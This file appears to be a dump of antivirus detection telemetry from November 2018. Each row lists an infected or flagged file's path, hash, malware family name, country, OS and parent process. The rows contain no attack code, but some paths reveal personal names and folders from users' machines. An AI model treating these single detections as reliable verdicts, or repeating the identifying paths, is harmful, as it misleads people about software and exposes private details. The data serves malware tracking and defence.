  Row(detection=Row(filename='tmp00087852', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp00087852', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:45:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new folder.exe', filepath='\\\\NERA001\\Stock Sim รวม\\New Folder.exe', filesize=1536000, name='TR/Patched.Ren.Gen.#M300.#R3264'), hash='1c4a096765790c142a8d5727b5cfc4191c090afb49dc9a6b9be6bca4ebfddd4a', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T03:47:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpqdirec.exe', filepath='C:\\PROGRAM FILES\\HP\\DIGITAL IMAGING\\bin\\Hpqdirec.exe', filesize=960000, name='W32/Sality.AG.#M1.#R1'), hash='61f8a151c406fb205f4fca3224e876812a1fe9a6f78edab534c7e68cd447f797', metadata=Row(cmdline='\\\\\\"C:\\\\\\/Program Files\\\\\\/Mobile Partner\\\\\\/UpdateDog\\\\\\/\\\\\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\ProgramData\\Mobile Partner\\OnlineUpdate\\ouc.exe', parentsize=312320, timestamp='2018-11-01T13:31:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T10:11:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002255-3b4d1756', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002255-3B4D1756', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-230532-790f9a76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4156b8d9\\AVSCAN-20181101-230518-766B731F\\AVSCAN-20181101-230532-790F9A76', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:05:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4a18a77c8654c00fda2cd01edf0e570f27501327d9f4f55f60da9a91887050be.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-16.available\\Avira\\4A18A77C8654C00FDA2CD01EDF0E570F27501327D9F4F55F60DA9A91887050BE.VIR', filesize=384000, name='X2000M/Laroux.FO.#M1.#R1'), hash='4a18a77c8654c00fda2cd01edf0e570f27501327d9f4f55f60da9a91887050be', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:56:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-203513-83078b5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ee4c7d66\\AVSCAN-20181101-202523-4C326308\\AVSCAN-20181101-203513-83078B5C', filesize=32000, name='PUA/MyWebSearch.#M1.#R1'), hash='420ab732fc5ddc4e174d75423aa713eb3ca9916d24220717893bca0487bdacfc', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:35:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T13:58:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:20:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='civ3conquestsedit.exe', filepath='F:\\Infogrames Interactive\\Civilization III\\Conquests\\Civ3ConquestsEdit.exe', filesize=1472000, name='W32/Almanahe.C.#M1.#R1'), hash='60eaca1925c7cb8b96eb4a00edd054d96ef1a47bb10589ca66c0c058b9757dc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setupdatamngr_ilivid.exe', filepath='C:\\Windows\\Temp\\b22040ca\\SetupDataMngr_iLivid.exe', filesize=8680000, name='PUA/iLivid.iona.#M1.#R1'), hash='3ad255e09ca657043a4d99ae2e7d869dd8fa42e691f44d22b1c11364730eaa40', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002342-4063f1e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002342-4063F1E9', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fabrepair.exe', filepath='C:\\PortableApps\\DVDFabPortable 9.3.1.2\\App\\DVDFab9\\FabRepair.exe', filesize=120000, name='W32/Neshta.A.#M1.#R1'), hash='0a56d3a0f3107d7a295c1968f69ecacc0c61616a21b76b228a25cf5ca7ce5070', metadata=Row(cmdline='\\\\\\/864A627C-C6B2-464A-AA13-25D62F282BD8 ', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='G:\\IT_2\\_Downloads22\\_Portable\\Portable Wondershare Video Converter Ultimate 9.0.4.0 Multilingual\\Wondershare Video Converter Ultimate 9.0.4.0 Portable\\App\\local\\stubexe\\0xF20480E8788E3F81\\WSVCUSplash.exe', parentsize=26712, timestamp='2018-11-01T16:45:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-083146-8ec516cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_07863e8e\\AVSCAN-20181101-082637-63AB43C4\\AVSCAN-20181101-083146-8EC516CF', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:31:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='g_isdel.exe', filepath='\\\\?\\D:\\3 GIS\\@د- سحر سالم @\\د-سحر المنهج\\Arc GIS\\ArcGIS I Data\\g_ISDel.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='01c93d632bd38c6c6837913799d95951b56d6f6cf12040dbf572a02de9e07bb4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:20:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dpinst.exe', filepath='G:\\USUARIO\\Documents\\UTEIS\\Drivers\\OJProK8600\\OJProK8600_Basic_13\\setup\\dpinst_x32\\DPInst.exe', filesize=640000, name='W32/Sality.AT.#M1.#R1'), hash='7bcca573ba47f67fc9fd9cc43a58cf2660cf193ed3d007b4365d7ede956d0b77', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:09:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T01:26:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-132954-4fd8ad0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9c541cc\\AVSCAN-20181101-132942-4D97ABDE\\AVSCAN-20181101-132954-4FD8AD0A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:29:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='82ece8dafa69e795def8745457372f1ccecb67ff223427468f269a6488265d10', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\82ECE8DAFA69E795DEF8745457372F1CCECB67FF223427468F269A6488265D10', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='82ece8dafa69e795def8745457372f1ccecb67ff223427468f269a6488265d10', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:07:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182312-140b32f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_48e0cd15\\AVSCAN-20181101-182237-0FF99EE0\\AVSCAN-20181101-182312-140B32F1', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181103-004107-a6a90878', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0676114b\\AVSCAN-20181103-003701-827BAB03\\AVSCAN-20181103-004107-A6A90878', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:06:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T10:13:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140.vir', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ntujmnye.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\NtuJMnye.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='85aa8063c3ca004474b40dce5c7a8fefae1d6701970c061fdd7693db4b0e424f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\85AA8063C3CA004474B40DCE5C7A8FEFAE1D6701970C061FDD7693DB4B0E424F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='85aa8063c3ca004474b40dce5c7a8fefae1d6701970c061fdd7693db4b0e424f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150002-8cbab1af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150002-8CBAB1AF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sicurezza programmi 2010-2011.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO\\SORZI PROGRAMMI\\sicurezza programmi\\sicurezza programmi 2010-2011.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:30:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-224920-a8f80f9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aed1a481\\AVSCAN-20181031-224846-A49E9402\\AVSCAN-20181031-224920-A8F80F9C', filesize=64000, name='TR/Dropper.Gen.#M300.#R3510'), hash='ef6cb4ac9bf0c6aeed67213b8096b15e5b6d77e62b1000705016aca1c7c252be', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:49:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Users\\X\\BERLIN\\Pictures\\Von NOKIA Lumia 610\\HORST\\C Benutzer\\vf2903727728\\AppData\\Local\\LPT\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='d8cf028d5f2891f0ed68774e201f057ae589aeadcc041a21bdf72776b4b8a9de', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T08:56:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000a73e', filepath='C:\\Windows\\Temp\\10b3fca6-3fe9-4555-8847-c80a2fdb4986\\tmp0000041e\\tmp0000a73e', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='bc1d966a398900866da1a0dbfcabd3ec6bce1f5e35a35253b7d0041c2f759c1f', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.2.889.11556\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T11:07:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='collect2.exe', filepath='C:\\Program Files (x86)\\CodeBlocks\\MinGW\\libexec\\gcc\\mingw32\\5.1.0\\collect2.exe', filesize=512000, name='W32/Neshta.A.#M1.#R1'), hash='8deea902fa6e72b14cc54d60270f6119720aa4512f2dc898cebf0de4c0f8897e', metadata=Row(cmdline='-m:aeinv.dll -f:UpdateSoftwareInventoryW', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T01:38:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='droplet template.exe', filepath='C:\\Program Files\\Adobe\\Adobe Photoshop CS2\\Required\\Droplet Template.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='d3050b412e2913a0a912ffa0d79ab149a148e4f2cf624d8a2de34b0edb5d8bb3', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:57:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='f24c205f24578e614174b82301bfb53e438f56a3b719d72bd0537dd306d4d9f3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T10:21:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c02090a7376a36a814cb0ae174dc9e13182471810320ea47edde1ad03990abf7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C02090A7376A36A814CB0AE174DC9E13182471810320EA47EDDE1AD03990ABF7', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='c02090a7376a36a814cb0ae174dc9e13182471810320ea47edde1ad03990abf7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:50:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214126-39cdc3f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b5d9c735\\AVSCAN-20181101-213955-2E451637\\AVSCAN-20181101-214126-39CDC3F5', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:41:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{AB1AF8A9-4061-43C6-8DD9-5B737E2EC0A7}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='e76f410aa935de472affe89696e8e793a0dffa20e70cf1b945fb9b851694e667', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:00:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sezallari kujtesa.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\SEZALLARI KUJTESA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:18:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='terminator 2015.exe', filepath='F:\\\xa0\\terminator 2015\\terminator 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsk8269.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-01T16:59:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\vck1uciijtz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:28:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183145-454f9894', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183145-454F9894', filesize=64000, name='VBA/Dldr.Agent.qydjt.#M1.#R1'), hash='ae4ceb7a94761bad0147d3e5e790ecaeb29c6c5dcac76fba6c7afa1534b39fa2', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:15:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Documents and Settings\\X\\Moje dokumenty\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:51:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000243bb', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243bb', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:48:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T04:59:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132311-4d524b82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132311-4D524B82', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:23:09Z'), dt=datetime.date(2018, 11, 4)),
